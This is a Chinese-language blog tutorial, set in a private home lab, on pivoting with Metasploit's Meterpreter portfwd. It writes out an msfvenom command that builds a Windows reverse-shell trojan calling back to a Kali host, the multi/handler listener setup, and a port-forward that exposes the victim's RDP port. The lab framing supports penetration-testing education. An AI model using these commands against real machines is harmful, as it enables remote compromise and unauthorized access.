当前位置:网站首页>portfwd 端口转发

portfwd 端口转发

2022-07-24 17:04:00 ailx10

前面我们已经学习了ssh端口转发、防火墙端口转发、rinetd端口转发、nc端口转发、socat端口转发、portmap端口转发,今天我们来学习portfwd端口转发,portfwd 是meterpreter 中的一个功能,那么本次实验就先来制造一个小马,然后基于meterpreter的portfwd,实现远程端口转发,访问跳板机kali的1111端口,就能访问内网win7的3389端口,这也叫3389端口反弹~

实验环境:

  • macos:192.168.199.206
  • kali:192.168.199.247
  • win7:192.168.199.185

1、生成一个小马

msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.199.247 -f exe > hack.exe

e9c2ececfa1ca7f305a8888a439cab0c.jpeg

2、通过metasploit监听5555端口

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555

92c0bef598f9d9df619d5f4a2adef6b9.jpeg

3、找个windows虚拟机,运行小马

exploit -j -z
sessions

4ffc62e7f156c9e7d7796da1efab71b1.jpeg

4、进入sessions,然后使用portfwd进行端口转发

portfwd add -l 1111  -r 127.0.0.1 -p 3389

71bd6f55825dfa3f74e324d390a5bc61.jpeg

5、访问kali的1111端口,就是访问win7的3389端口

a38d8b2bdc87d827b7e4642b90b9617c.jpeg

网络安全任重道远,洗洗睡吧~

8dff67f74e5332a82a08c04dd20e3484.gif

原网站

版权声明
本文为[ailx10]所创,转载请带上原文链接,感谢
https://ailx10.blog.csdn.net/article/details/125957683

边栏推荐

猜你喜欢

随机推荐